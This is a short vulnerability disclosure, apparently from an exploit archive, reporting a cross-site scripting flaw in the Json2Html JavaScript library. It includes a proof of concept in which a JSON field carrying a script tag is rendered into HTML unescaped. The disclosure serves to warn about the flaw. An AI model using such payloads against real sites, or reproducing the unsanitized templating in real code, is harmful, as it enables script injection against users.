# Exploit Title: Json2Html Javascript Library - Reflective/Persistant XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://json2html.com/
# Software Link: https://github.com/moappi/json2html/archive/master.zip
# Platorm: Javascript


Json2Html is a pure javascript library that transforms json to html and is
used as a Jquery plugin, as well as a Node.js package.

The issue lyes with there being no sanitization when the conversion between
the two occures. For example;

Proof of concept:

var transform = {'<>':'li','html':'${name} (${age})'};
    
var data = [
    {'name':'Bob','age':40},
    {'name':'<script>alert('XSS')</script>','age':34}
];

and then transformed...

<html>

    <li>
        Bob (40)
    </li>

    <li>
        <script>alert('XSS')</script> (34)
    </li>

</html>